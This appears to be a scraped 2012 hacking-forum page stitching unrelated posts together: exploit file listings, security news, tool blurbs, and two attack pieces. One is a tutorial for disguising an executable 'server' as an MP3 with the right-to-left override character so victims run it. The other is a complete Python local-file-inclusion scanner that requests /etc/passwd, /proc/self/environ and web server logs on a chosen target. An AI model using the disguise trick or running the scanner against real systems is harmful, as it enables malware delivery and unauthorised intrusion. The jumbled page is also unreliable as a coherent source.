25581 wpbadbehavior-xss.txt -a--- 5/11/2012 5:31 AM 6587 wpbetterwp-xss.txt -a--- 5/11/2012 5:32 AM 7078 wpbulletproof-xss.txt -a--- 5/15/2012 6:08 AM 1024 wpcatablog-xss.txt -a--- 5/15/2012 6:05 AM 686 wpcodestyling-xss.txt -a--- 5/11/2012 5:29 AM 12032 wpcustomcontacts-xss.txt -a--- 5/15/2012 6:02 AM 786 wpdownloadmanager-xss.txt -a--- 5/15/2012 6:00 AM 960 wpdownloadmonitor-xss.txt -a--- 5/15/2012 5:59 AM 668 wpdynamicwidgets-xss.txt -a--- 5/15/2012 5:09 AM 685 wpeasygallery-xss.txt -a--- 5/15/2012 5:58 AM 684 wpezpzoneclickbackup-xss.txt -a--- 5/13/2012 6:22 PM 1113 wpfacethumb-xss.txt -a--- 5/15/2012 5:54 AM 1340 wpforumserver-sqlxss.txt -a--- 5/15/2012 5:53 AM 814 wpgdstarrating-xss.txt -a--- 5/15/2012 5:57 AM 771 wpgrandflashalbumgallery-xss.txt -a--- 5/15/2012 5:52 AM 718 wpiframeadminpages-xss.txt -a--- 5/15/2012 5:49 AM 763 wpleaflet-xss.txt -a--- 5/15/2012 5:46 AM 841 wpleaguemanager-xss.txt -a--- 5/15/2012 5:45 AM 818 wpmediacategories-xss.txt -a--- 5/15/2012 5:44 AM 1089 wpmingleforum-xss.txt -a--- 5/15/2012 5:43 AM 689 wpnetworkpublisher-xss.txt -a--- 5/15/2012 5:42 AM 1552 wpnewslettermanager-xss.txt -a--- 5/15/2012 5:51 AM 838 wppdfprintbutton-xss.txt -a--- 5/15/2012 5:40 AM 1333 wpprettylinklite-sqlxss.txt -a--- 5/15/2012 5:19 AM 761 wpshareandfollow-xss.txt -a--- 5/15/2012 5:18 AM 821 wpsharebar-sqlxss.txt -a--- 5/15/2012 5:17 AM 913 wpsoundcloud-xss.txt -a--- 5/15/2012 5:06 AM 804 wpstatistics-xss.txt -a--- 5/15/2012 5:16 AM 1028 wpsubscribe2-xss.txt -a--- 5/15/2012 5:03 AM 1347 wpsurveyquiztool-xss.txt -a--- 5/15/2012 9:00 PM 711 wptrackthatstat-xss.txt -a--- 5/15/2012 5:00 AM 1542 wpzingiriwebshop235-xss.txt -a--- 5/9/2012 8:22 PM 1030 x7chat-xsrf.txt -a--- 5/29/2012 1:57 AM 4182 yamamah-disclose.txt -a--- 5/22/2012 6:38 AM 851 yandex-xss.txt -a--- 5/23/2012 6:22 PM 869 ydframework-disclose.txt -a--- 5/3/2012 12:41 AM 7231 ZSL-2012-5086.txt -a--- 5/9/2012 5:08 AM 1081 ZSL-2012-5087.txt -a--- 5/17/2012 2:42 AM 1393 ZSL-2012-5088.txt -a--- 5/17/2012 3:10 AM 1063 ZSL-2012-5089.txt -a--- 5/17/2012 3:17 AM 3110 ZSL-2012-5090.txt -a--- 5/17/2012 3:19 AM 2751 ZSL-2012-5091.txt Download Packet Storm New Exploits For May, 2012 ? Packet Storm

Vre?i s? munci?i dar nu ave?i unde? Poftim: https://rstcenter.com/forum/53480-youve-got-money.rst

Sudeep Singh 5/21/2012 Table of Contents Preface Advanced Hash Cracking ...3 Cryptographic Hash Properties ...4 Hash to the Stash ...5 Oclhashcat – An insight ...6 The need for Stronger Hashes ...13 Fast vs Slow Hashes ...19 How much Salt? ...20 How Many Iterations? ...21 John The Ripper (JTR) – Tweak That Attack! ...25 JTR POT Analyzer ...27 Word Mangling Rules ...33 GPU Vs CPU ...37 Conclusion. ...41 References ...43 http://dl.packetstormsecurity.net/papers/general/advanced-crack.pdf

The United Nations will meet in Dubai this December to make a decision that could carry significant consequences for the future of all web users: Should the UN be granted more control over the Internet? With the high-profile meeting looming at the end of this year’s calendar, key members of the U.S. government and private sector firms will meet with lawmakers Thursday to argue that the U.S. should work to defeat the proposal, which they consider a dangerous breach of existing norms. Currently, the Internet is regulated in what’s called a “multi-stakeholder” model, with various private and public organizations each playing specific roles in keeping the its wheels spinning. Change that setup, argues the panel, and you put at risk the entire structure of the Internet. “A top-down, centralized, international regulatory overlay is antithetical to the architecture of the Net, which is a global network of networks without borders,” wrote FCC Commissioner and panel member Robert McDowell in the Wall Street Journal. “No government, let alone an intergovernmental body, can make engineering and economic decisions in lightning-fast Internet time.” Countries in favor of the plan, such as Russia and China, have argued that the organizations currently charged with oversight of the Internet, such as the Internet Corporation for Assigned Names and Numbers, or ICANN, are too closely tied to the United States. Moving Internet regulatory authority to the UN, they argue, would democratize control over it. However, some Internet privacy experts are concerned that giving censorship-heavy nations such as China more say in Internet regulation would have disastrous consequences for online free speech. “Maybe it bothers you that the U.S. controls these major keys to the Internet, but I think it’s a good thing,” wrote Larry Seltzer for Byte. “Without control of these critical facilities, no international group of dictators can really exert much control outside of their own boundaries.” Included in the panel will be Ambassador Philip Verveer, Deputy Assistant Secretary of State and U.S. Coordinator for International Communications and Information Policy; FCC Commissioner Robert McDowell; Ambassador David A. Gross, Former U.S. Coordinator for International Communications and Information Policy; Sally Shipman Wentworth, Senior Manager of Public Policy at the Internet Society and Vinton Cerf, Vice President and Chief Internet Evangelist at Google. The House subcommittee panel will be broadcast via the web at 10:15 a.m. ET on Thursday, May 31. Source

Overview Part I User Commands 2 Part II System Calls 738 Part III Library Functions 892 Part IV Special Files 1064 Part V File Formats 1104 Part VI Games 1210 Part VII Miscellaneous 1214 Part VIII Administration and Privileged Commands 1258 Part IX Kernel Reference Guide 1424 Download

https://rstcenter.com/forum/28420-interviu-bine-ati-venit.rst

This is a usefull tut I found, all credits go to Cuddle: This tutorial will show you how to make your .exe (or .com/.scr) files look like .jpeg/.mp3 or any other filetype! By normally changing the extension to e.g .mp3, will corrupt your file, but with this exploit your file will still be executable! 1. I have my server.exe, but I want it to look like a mp3 file, so people would run it. In this case, you should change the .exe to .scr to make it look more legit in the end. Now, rename your server.scr (which is still executable) to "songname uploaded by .SCR" (notice the space). 2. Now it's time to use the exploit! Open up the Character Map: Scroll down and find the "U+202E: Right-To-Left Override" character: Click "Select" and then "Copy". 3. Now choose to rename your file, and paste the copied character right before the ".SCR" (press ctrl+v to paste) Then type "3pm" (without the " ") and press Enter. Now it should look like this: Done! Obviously you might want to change the icon to look like an mp3 before doing this.. A short video can be found here: - [MediaFire] - [MultiUpload] - [ ] (Watch in HD + Fullscreen) Most browsers have patched this, but it can be used on IM's like MSN or Yahoo Messenger. To upload the file to a filehost, you need to make a .rar file with your server inside. Now go ahead and mix around with .exe/.scr/.com and the fake-extensions to find some other legit-looking combinations! If you have any questions, feel free to ask! : blackhat: Also, here's a .pdf explaining the exploit: http://dl.packetstormsecurity.net/papers/general/righttoleften-override.pdf Those who can't find the character in the default CharMap in windows, do this: (not sure if it works but worth a try) 1. Download BabelMap and run it. 2. Open this picture: - Make sure "Single Font" is ticked and "Arial Unicode MS" is chosen as Font. - Search for OVERRIDE and click on the RTLO character (row 2020, column E) - Click on the Select-button - Click on the Copy button Also, those who have problems with WinXP and non-english OS versions, take a look at this. article from r00tw0rm

Description PwnPi v1.0 ---------- -------- About -------- ssh : enabled at boot vnc : ssh into pwnpi and run ./start-vnc-1024x768.sh (you can open this with nano and change the resolution) base distro : debian squeeze desktop environment : xfce ----- ssh ----- username : root password : root ----- vnc ----- vnc password = rasppi --------------- postgresql --------------- username : root password : root database : postgres (used for metasploit) --------------- metasploit --------------- dont run metasploit when x is running as there is not enough memory. Logout and cd to /pentest/exploits/framework3 then ./msf.sh to connect to the database and load db_autopwn. make sure you have started the postgresql server if you want database support by running /etc/init.d/postgresql start ---------------------------------------------- bugs/suggestions/tool requests/ Download Source

ok, inchid topicul

iptables is built on top of netfilter, the packet alteration framework for Linux 2.4.x and 2.6.x. It is a major rewrite of its predecessor ipchains, and is used to control packet filtering, Network Address Translation (masquerading, portforwarding, transparent proxying), and special effects such as packet mangling. Changes: This release supports the new cttimeout infrastructure. This allows you to attach specific timeout policies to flow via iptables CT targets. Download Linux IPTables Firewall 1.4.14 ? Packet Storm

send.php <?php ?> Tracking Number ce e, pagina de banca?

# Author: parkdream1 # Messenger: h3x4r # (c) R00TW0RM - Private Community # https://r00tw0rm.com/ # Local File Include Scaner # Greets: To all members of r00tw0rm !! Usage: h3x4r.py <Target IP> <Port> <Path> Example: python h3x4r.py playerstage.sourceforge.net 80 index.php?src= Information -- Random User-Agent -- Coded Use Language Python Banner() Not Vulnerability Vulnerability [*] Update Ver. 1.1 Menu Select Add scan type environ,logs [Python] scan ver 1.1.py - Pastebin.com #!/usr/bin/python # Author: parkdream1 # Messenger: h3x4r # (c) R00TW0RM - Private Community # https://r00tw0rm.com/ # Local File Include Scaner Ver. 1.1 # Greets: To all members of r00tw0rm !! import socket,sys,re,random,time,httplib from random import choice passwd = ["/etc/passwd", "../etc/passwd", "../../etc/passwd", "../../../etc/passwd", "../../../../etc/passwd", "../../../../../etc/passwd", "../../../../../../etc/passwd", "../../../../../../../etc/passwd", "../../../../../../../../etc/passwd", "../../../../../../../../../etc/passwd", "../../../../../../../../../../etc/passwd", "../../../../../../../../../../../etc/passwd", "../../../../../../../../../../../../etc/passwd", "../../../../../../../../../../../../../etc/passwd", "/etc/passwd%00", "../etc/passwd%00", "../../etc/passwd%00", "../../../etc/passwd%00", "../../../../etc/passwd%00", "../../../../../etc/passwd%00", "../../../../../../etc/passwd%00", "../../../../../../../etc/passwd%00", "../../../../../../../../etc/passwd%00", "../../../../../../../../../etc/passwd%00", "../../../../../../../../../../etc/passwd%00", "../../../../../../../../../../../etc/passwd%00", "../../../../../../../../../../../../etc/passwd%00", "../../../../../../../../../../../../../etc/passwd%00"] environ = ["/proc/self/environ", "../proc/self/environ", "../../proc/self/environ", "../../../proc/self/environ", "../../../../proc/self/environ", "../../../../../proc/self/environ", "../../../../../../proc/self/environ", "../../../../../../../proc/self/environ", "../../../../../../../../proc/self/environ", "../../../../../../../../../proc/self/environ", "../../../../../../../../../../proc/self/environ", "../../../../../../../../../../../proc/self/environ", "../../../../../../../../../../../../proc/self/environ", "../../../../../../../../../../../../../proc/self/environ", "../../../../../../../../../../../../../../proc/self/environ", "/proc/self/environ%00", "../proc/self/environ%00", "../../proc/self/environ%00", "../../../proc/self/environ%00", "../../../../proc/self/environ%00", "../../../../../proc/self/environ%00", "../../../../../../proc/self/environ%00", "../../../../../../../proc/self/environ%00", "../../../../../../../../proc/self/environ%00", "../../../../../../../../../proc/self/environ%00", "../../../../../../../../../../proc/self/environ%00", "../../../../../../../../../../../proc/self/environ%00", "../../../../../../../../../../../../proc/self/environ%00", "../../../../../../../../../../../../../proc/self/environ%00", "../../../../../../../../../../../../../../proc/self/environ%00"] logs = ["/usr/local/apache2/logs/access_log", "../usr/local/apache2/logs/access_log", "../../usr/local/apache2/logs/access_log", "../../../usr/local/apache2/logs/access_log", "../../../../usr/local/apache2/logs/access_log", "../../../../../usr/local/apache2/logs/access_log", "../../../../../../usr/local/apache2/logs/access_log", "../../../../../../../usr/local/apache2/logs/access_log", "../../../../../../../../usr/local/apache2/logs/access_log", "../../../../../../../../../usr/local/apache2/logs/access_log", "../../../../../../../../../../usr/local/apache2/logs/access_log", "../../../../../../../../../../../usr/local/apache2/logs/access_log", "../../../../../../../../../../../../usr/local/apache2/logs/access_log", "../../../../../../../../../../../../../usr/local/apache2/logs/access_log", "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log", "/usr/local/apache2/logs/access_log%00", "../usr/local/apache2/logs/access_log%00", "../../usr/local/apache2/logs/access_log%00", "../../../usr/local/apache2/logs/access_log%00", "../../../../usr/local/apache2/logs/access_log%00", "../../../../../usr/local/apache2/logs/access_log%00", "../../../../../../usr/local/apache2/logs/access_log%00", "../../../../../../../usr/local/apache2/logs/access_log%00", "../../../../../../../../usr/local/apache2/logs/access_log%00", "../../../../../../../../../usr/local/apache2/logs/access_log%00", "../../../../../../../../../../usr/local/apache2/logs/access_log%00", "../../../../../../../../../../../usr/local/apache2/logs/access_log%00", "../../../../../../../../../../../../usr/local/apache2/logs/access_log%00", "../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00", "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00", "/var/log/apache2/access.log", "../var/log/apache2/access.log", "../../var/log/apache2/access.log", "../../../var/log/apache2/access.log", "../../../../var/log/apache2/access.log", "../../../../../var/log/apache2/access.log", "../../../../../../var/log/apache2/access.log", "../../../../../../../var/log/apache2/access.log", "../../../../../../../../var/log/apache2/access.log", "../../../../../../../../../var/log/apache2/access.log", "../../../../../../../../../../var/log/apache2/access.log", "../../../../../../../../../../../var/log/apache2/access.log", "../../../../../../../../../../../../var/log/apache2/access.log", "../../../../../../../../../../../../../var/log/apache2/access.log", "../../../../../../../../../../../../../../var/log/apache2/access.log", "/var/log/apache2/access.log%00", "../var/log/apache2/access.log%00", "../../var/log/apache2/access.log%00", "../../../var/log/apache2/access.log%00", "../../../../var/log/apache2/access.log%00", "../../../../../var/log/apache2/access.log%00", "../../../../../../var/log/apache2/access.log%00", "../../../../../../../var/log/apache2/access.log%00", "../../../../../../../../var/log/apache2/access.log%00", "../../../../../../../../../var/log/apache2/access.log%00", "../../../../../../../../../../var/log/apache2/access.log%00", "../../../../../../../../../../../var/log/apache2/access.log%00", "../../../../../../../../../../../../var/log/apache2/access.log%00", "../../../../../../../../../../../../../var/log/apache2/access.log%00", "../../../../../../../../../../../../../../var/log/apache2/access.log%00", "/var/log/httpd/access_log", "../var/log/httpd/access_log", "../../var/log/httpd/access_log", "../../../var/log/httpd/access_log", "../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/access_log", "../../../../../../var/log/httpd/access_log", "../../../../../../../var/log/httpd/access_log", "../../../../../../../../var/log/httpd/access_log", "../../../../../../../../../var/log/httpd/access_log", "../../../../../../../../../../var/log/httpd/access_log", "../../../../../../../../../../../var/log/httpd/access_log", "../../../../../../../../../../../../var/log/httpd/access_log", "../../../../../../../../../../../../../var/log/httpd/access_log", "../../../../../../../../../../../../../../var/log/httpd/access_log", "/var/log/httpd/access_log%00", "../var/log/httpd/access_log%00", "../../var/log/httpd/access_log%00", "../../../var/log/httpd/access_log%00", "../../../../var/log/httpd/access_log%00", "../../../../../var/log/httpd/access_log%00", "../../../../../../var/log/httpd/access_log%00", "../../../../../../../var/log/httpd/access_log%00", "../../../../../../../../var/log/httpd/access_log%00", "../../../../../../../../../var/log/httpd/access_log%00", "../../../../../../../../../../var/log/httpd/access_log%00", "../../../../../../../../../../../var/log/httpd/access_log%00", "../../../../../../../../../../../../var/log/httpd/access_log%00", "../../../../../../../../../../../../../var/log/httpd/access_log%00", "../../../../../../../../../../../../../../var/log/httpd/access_log%00", "/var/log/httpd-access.log", "../var/log/httpd-access.log", "../../var/log/httpd-access.log", "../../../var/log/httpd-access.log", "../../../../var/log/httpd-access.log", "../../../../../var/log/httpd-access.log", "../../../../../../var/log/httpd-access.log", "../../../../../../../var/log/httpd-access.log", "../../../../../../../../var/log/httpd-access.log", "../../../../../../../../../var/log/httpd-access.log", "../../../../../../../../../../var/log/httpd-access.log", "../../../../../../../../../../../var/log/httpd-access.log", "../../../../../../../../../../../../var/log/httpd-access.log", "../../../../../../../../../../../../../var/log/httpd-access.log", "../../../../../../../../../../../../../../var/log/httpd-access.log", "/var/log/httpd-access.log%00", "../var/log/httpd-access.log%00", "../../var/log/httpd-access.log%00", "../../../var/log/httpd-access.log%00", "../../../../var/log/httpd-access.log%00", "../../../../../var/log/httpd-access.log%00", "../../../../../../var/log/httpd-access.log%00", "../../../../../../../var/log/httpd-access.log%00", "../../../../../../../../var/log/httpd-access.log%00", "../../../../../../../../../var/log/httpd-access.log%00", "../../../../../../../../../../var/log/httpd-access.log%00", "../../../../../../../../../../../var/log/httpd-access.log%00", "../../../../../../../../../../../../var/log/httpd-access.log%00", "../../../../../../../../../../../../../var/log/httpd-access.log%00", "../../../../../../../../../../../../../../var/log/httpd-access.log%00", "/var/www/logs/access_log", "../var/www/logs/access_log", "../../var/www/logs/access_log", "../../../var/www/logs/access_log", "../../../../var/www/logs/access_log", "../../../../../var/www/logs/access_log", "../../../../../../var/www/logs/access_log", "../../../../../../../var/www/logs/access_log", "../../../../../../../../var/www/logs/access_log", "../../../../../../../../../var/www/logs/access_log", "../../../../../../../../../../var/www/logs/access_log", "../../../../../../../../../../../var/www/logs/access_log", "../../../../../../../../../../../../var/www/logs/access_log", "../../../../../../../../../../../../../var/www/logs/access_log", "../../../../../../../../../../../../../../var/www/logs/access_log", "/var/www/logs/access_log%00", "../var/www/logs/access_log%00", "../../var/www/logs/access_log%00", "../../../var/www/logs/access_log%00", "../../../../var/www/logs/access_log%00", "../../../../../var/www/logs/access_log%00", "../../../../../../var/www/logs/access_log%00", "../../../../../../../var/www/logs/access_log%00", "../../../../../../../../var/www/logs/access_log%00", "../../../../../../../../../var/www/logs/access_log%00", "../../../../../../../../../../var/www/logs/access_log%00", "../../../../../../../../../../../var/www/logs/access_log%00", "../../../../../../../../../../../../var/www/logs/access_log%00", "../../../../../../../../../../../../../var/www/logs/access_log%00", "../../../../../../../../../../../../../../var/www/logs/access_log%0", "/var/apache2/logs/access_log", "../var/apache2/logs/access_log", "../../var/apache2/logs/access_log", "../../../var/apache2/logs/access_log", "../../../../var/apache2/logs/access_log", "../../../../../var/apache2/logs/access_log", "../../../../../../var/apache2/logs/access_log", "../../../../../../../var/apache2/logs/access_log", "../../../../../../../../var/apache2/logs/access_log", "../../../../../../../../../var/apache2/logs/access_log", "../../../../../../../../../../var/apache2/logs/access_log", "../../../../../../../../../../../var/apache2/logs/access_log", "../../../../../../../../../../../../var/apache2/logs/access_log", "../../../../../../../../../../../../../var/apache2/logs/access_log", "../../../../../../../../../../../../../../var/apache2/logs/access_log", "/var/apache2/logs/access_log%00", "../var/apache2/logs/access_log%00", "../../var/apache2/logs/access_log%00", "../../../var/apache2/logs/access_log%00", "../../../../var/apache2/logs/access_log%00", "../../../../../var/apache2/logs/access_log%00", "../../../../../../var/apache2/logs/access_log%00", "../../../../../../../var/apache2/logs/access_log%00", "../../../../../../../../var/apache2/logs/access_log%00", "../../../../../../../../../var/apache2/logs/access_log%00", "../../../../../../../../../../var/apache2/logs/access_log%00", "../../../../../../../../../../../var/apache2/logs/access_log%00", "../../../../../../../../../../../../var/apache2/logs/access_log%00", "../../../../../../../../../../../../../var/apache2/logs/access_log%00", "../../../../../../../../../../../../../../var/apache2/logs/access_log%00"] user = ['Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)', 'Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)', 'Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)', 'Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11', 'Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.8.131 Version/11.11', 'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11'] agent = random.choice(user) def scanpasswd(): for lfi in passwd: try: r = socket.socket(socket.AF_INET,socket.SOCK_STREAM) r.connect((target, port)) r.send("GET /"+path+lfi+" HTTP/1.0\r\n") r.send("Host: "+target+"\r\n") r.send("User-Agent: "+agent+"\r\n\r\n") print "[*] Send Request Success" print "http://"+target+"/"+path+lfi page = r.recv(1024) fullpage = "" while len(page): fullpage = fullpage + page page = r.recv(1024) r.close() except Exception, e: print "[-] Cant Not Send Request" print e sys.exit(1) r00t = re.search("root:x:0:0:",fullpage) if r00t: print "\033[32m[*] Request Vulnerability\n" sys.exit(1) else: print "[-] Request Is Not Vulnerability\n" time.sleep(1) def scanenviron(): for lfi1 in environ: try: r = socket.socket(socket.AF_INET,socket.SOCK_STREAM) r.connect((target, port)) r.send("GET /"+path+lfi1+" HTTP/1.0\r\n") r.send("Host: "+target+"\r\n") r.send("User-Agent: "+agent+"\r\n\r\n") print "[*] Send Request Success" print "http://"+target+"/"+path+lfi1 page = r.recv(1024) fullpage = "" while len(page): fullpage = fullpage + page page = r.recv(1024) r.close() except Exception, e: print "[-] Cant Not Send Request" print e sys.exit(1) r00t = re.search("HTTP_HOST",fullpage) if r00t: print "\033[32m[*] Request Vulnerability\n" sys.exit(1) else: print "[-] Request Is Not Vulnerability\n" time.sleep(1) def scanlogs(): conn = httplib.HTTPConnection(target) conn.request("HEAD","/") for lfi2 in logs: try: r = socket.socket(socket.AF_INET,socket.SOCK_STREAM) r.connect((target, port)) r.send("GET /"+path+lfi2+" HTTP/1.0\r\n") r.send("Host: "+target+"\r\n") r.send("User-Agent: "+agent+"\r\n\r\n") print "[*] Send Request Success" print "http://"+target+"/"+path+lfi2 page = r.recv(1024) fullpage = "" while len(page): fullpage = fullpage + page page = r.recv(1024) r.close() except Exception, e: print "[-] Cant Not Send Request" print e sys.exit(1) r00t = re.search("HEAD / HTTP/1.1",fullpage) if r00t: print "\033[32m[*] Request Vulnerability\n" sys.exit(1) else: print "[-] Request Is Not Vulnerability\n" time.sleep(1) def menu(): print "Menu:\n" print "ID [1]" print "[Scan /etc/passwd File]\n" print "ID [2]" print "[Scan Environ File]\n" print "ID [3]" print "[Scan Access Logs File]\n" print "ID [4]" print "[Exit]\n" mess = raw_input("[*] Select ID For Start Scanner :") if mess == "1": print "Scan /etc/passwd File Starting ...\n" scanpasswd() sys.exit(1) if mess == "2": print "Scan /proc/self/environ File Starting ...\n" scanenviron() sys.exit(1) if mess == "3": print "Scan Access Logs File Starting ...\n" scanlogs() sys.exit(1) if mess == "4": print "Exiting..." sys.exit(1) else: print "Unknow Command\n" print "Please rechoice ID\n" menu() def banner(): print "\n" print "****************************************************************************" print "|| Local File Include Scaner Ver. 1.1 ||" print "|| by parkdream1 ||" print "|| (c) R00TW0RM - Private Community ||" print " Fucking from "+target+" on port "+str(port) print "****************************************************************************" print "\n" if __name__ == '__main__': if len(sys.argv) != 4: print >>sys.stderr, "Usage:", sys.argv[0], "<Target IP> <Port> <Path>" print "Example: python", sys.argv[0], "playerstage.sourceforge.net 80 "+'"index.php?src="' sys.exit(1) target, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3] banner() menu() source

1. MyWot: WOT is a community-based, free safe surfing tool for browsers that provides website ratings & reviews to help web users as they search, surf & shop online. website: www.mywot.com) 2. VirusTotal: VirusTotal is a free virus, malware and URL online scanning service. File checking is done with more than 40 antivirus solutions. website: www.virustotal.com 3. Norton Safe Web, from Symantec Look up website safety information and safe site rankings from Norton Safe Web from Symantec. Read what others think and write your site reviews. website: www.safeweb.norton.com 4. Unmask Parasites Free online website security service. Check your web pages for hidden illicit content (invisible spam links, iframes, malicious scripts and redirects). website: www.unmaskparasites.com 5. Google Diagnostic: checks whether site hosts malware or not. website: http://google.com/safebrowsing/diagnostic?site=target.com 6.Online Link Scan Online Link Scan collects and summarizes the threat reports of the aforementioned Phishtank, AVG and Google Safe Browsing engines. website: www.onlinelinkscan.com

A.R.F Intro The A.R.F Project Anti-Reversing Framework v1.1 Author: Economou Kyriakos Contact: arfproject@hotmail.com Programming Language: C++ Compatibility: Win XP SP1 or above IDE plug ‘n compile: MS Visual Studio (tested with 2008/2010 editions), Embarcadero C++ builder (tested with 2010 edition). Release Date: 17d/01m/2011 Intro After having dedicated some years in breaking software protections I have arrived to some conclusions regarding how things work among software developing companies regarding this matter. A company that produces any type of software has always in mind the quality of the final product to be released. This means that its coders dedicate all of their time in developing the software that is going to be released by searching for bugs and errors and by improving the code of the software. However, when all this has come into an end, and it is time to release the software, all companies have to, or at least they should, deal with another big decision which is of course the “how” their product it is going to be protected by crackers. For the big companies that have more money than time in their hands it is more easy to decide because their budget can afford any type of commercial protections and it is only a matter of taste regarding the quality of the protection that it is going to be chosen. However, even if these companies are able to choose among a variety of protections, the impact of this decision can be destructive in zero time. Commercial protectors offer much more quality than the free of the kind but they have a major flaw. This flaw relies on the fact that before a company applies a well known commercial protector, others have already done it which means that probably it has been already reversed. So why should you spend money for a protection that you know that it has been already cracked?!? On the other hand, crackers have usually much more time than money in their hands and this is what makes them dangerous. They will usually try to break the protection by themselves or read a tutorial about it and use it as a guide. In any case it is just a matter of time before they say “Game Over!” So then, why companies do not create their own custom protections? The answer is simple, it requires time, money and people who know the basics of reverse engineering, in other words how a cracker would attack the protection of the software. All this would normally require a separate department of employees dedicated to the development of the protection itself, but companies don’t seem to approve this idea and you know the results. But crackers, won’t they crack that protection too? The answer is “Yes!” but as we have already said the entire game goes around a more specific and relative concept which is the “time”. A custom protection must be analyzed each time from scratch and if it is well designed it could take to crackers much more time than you may think, so the company will have the opportunity to gain time and money before the game arrives into an end. So what if a company wants to use a commercial protector? Even if they have the flaw that we discussed before, many commercial protectors are very good and can keep a big amount of crackers especially newbies away. But even in this case, why you should rely just to the protector itself?!? Well, you shouldn’t and here it is where the A.R.F Project comes into the game. You could use it in order to add an extra layer of protection inside the code of your application itself that will protect your software when the protector will not. Furthermore, it can be a good solution for single developers and companies that may not afford neither in terms of money the use of a commercial protector nor in terms of time the development of a custom protection from scratch. The A.R.F Project is Free and comes with full source code and documentation of the available anti-reversing methods. This gives also the possibility to the developers to modify these methods at will, combine them together and even more get inspired to create something better in less time than ever before. In addition, through the A.R.F Project you can understand how some of the most famous anti-reversing tricks work and learn how an attacker would attempt to bypass them, which will help you create your own custom software protection. The available methods will constantly be updated and more methods are going to be added in the days to come. The A.R.F project offers plug ‘n compile compatibility with MS Visual Studio (tested with 2008/2010 edition) and Embarcadero C++ Builder (tested with 2010 edition). Greetings: This project is dedicated to all the people that I really respect for their devotion to their passions without thinking about the consequences. A big salute to my friends Yiannis Marangos , Alexandros Theodoridis, Panos Papandoniou, Kyprianos Vasilopoulos and Anna Manousaki. Enjoy, Economou Kyriakos Site: http://www.anti-reversing.com/intro/ Download: http://www.anti-reversing.com/Downloads/A.R.F/A.R.F_v1.1.zip via: level-23.biz/forum/

Chocolatey - think executables/application packages (like apt-get for Windows), not library packages. This is what the Chocolatey NuGet goodness is for. Chocolatey allows you to install application nuggets and run executables from anywhere. ||Executable Nuggets| For example, say you have an executable in the tools folder of your package named bob.exe. Then you can type 'chocolatey install yourPackageName [-source source] [-version version]' OR 'cinst yourPackageName [-source source] [-version version]' and when it finishes you can type 'bob' and it will run your application executable. ||Application Nuggets - Full on double rainbow|| For example, say you type 'chocolatey install 7zip [-source source] [-version version]' OR 'cinst 7zip [-source source] [-version version]' - when it finishes you will have installed 7zip on your machine (in your add/remove programs). || Check out the WIKI in the project URL for all the details of what you can do with chocolatey! To install Chocolatey, run the following command from the command line or from PowerShell: C:\> cinst chocolatey How to Download packages list